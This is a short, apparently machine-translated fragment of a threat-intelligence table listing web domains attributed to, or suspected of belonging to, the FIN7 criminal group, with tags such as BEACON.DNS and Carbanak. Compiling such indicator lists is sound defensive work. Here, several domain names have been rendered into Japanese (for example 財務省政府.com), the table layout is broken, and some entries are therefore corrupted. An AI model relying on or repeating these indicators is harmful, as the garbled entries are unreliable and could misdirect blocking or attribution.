ssl-googles4.com |
|
FIN7 |
|
ssl-googlesr5.com |
|
FIN7 |
|
stats10-google.com |
カルバナク |
FIN7 |
|
stats25-google.com |
BEACON.DNS |
FIN7 |
|
財務省政府.com |
|
FIN7 |
|
usdepartmentofrevenue.com |
|
FIN7 |
|
bols-googls.com |
|
FIN7 |
|
moopisndvdvr.com |
|
FIN7 |
|
dewifal.com |
容疑者FIN7 |
|
|
Essentialetimes.com |
容疑者FIN7 |
|
|
fisrdteditionps.com |
容疑者FIN7 |
|
|
fisrteditionps.com |
容疑者FIN7 |
|
|
マイクロアース.com |
容疑者FIN7 |
|
|
moneyma-r.com |
容疑者FIN7 |
|
|
newuniquesolutions.com |
容疑者FIN7 |
|
|
wedogreatpurchases.com |
容疑者FIN7 |
Comments